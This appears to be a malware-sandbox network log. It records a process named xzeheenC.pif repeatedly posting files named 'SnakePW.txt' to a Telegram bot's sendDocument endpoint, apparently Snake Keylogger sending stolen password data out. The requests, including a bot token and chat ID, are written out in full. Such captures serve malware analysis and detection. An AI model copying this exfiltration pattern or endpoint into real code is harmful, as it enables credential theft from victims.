                                                                                                        2024-12-18 15:31:33 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419090,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535893,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        37192.168.2.849750149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:33 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fd9705a96a3
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:33 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 64 39 37 30 35 61 39 36 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fd9705a96a3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:34 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:34 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:34 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419092,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535894,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        38192.168.2.849751149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:33 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20a88e7882e3
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:33 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 61 38 38 65 37 38 38 32 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20a88e7882e3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:34 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:34 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:34 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419094,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535894,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        39192.168.2.849752149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:35 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20426636599f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:35 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 34 32 36 36 33 36 35 39 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20426636599fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:35 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:35 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:35 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419096,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535895,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        40192.168.2.849753149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:35 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fec91a656cd
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:35 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 65 63 39 31 61 36 35 36 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fec91a656cdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:36 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:36 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:36 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419098,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535896,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        41192.168.2.849754149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:35 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20bb0ba85598
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:35 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 62 62 30 62 61 38 35 35 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20bb0ba85598Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:36 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:36 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:36 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419100,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535896,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        42192.168.2.849755149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:37 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2059540f56aa
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:37 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 35 39 35 34 30 66 35 36 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2059540f56aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:37 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:37 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:37 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419102,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535897,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        43192.168.2.849756149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:37 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2003b93d294e
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:37 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 30 33 62 39 33 64 32 39 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2003b93d294eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:38 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:38 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
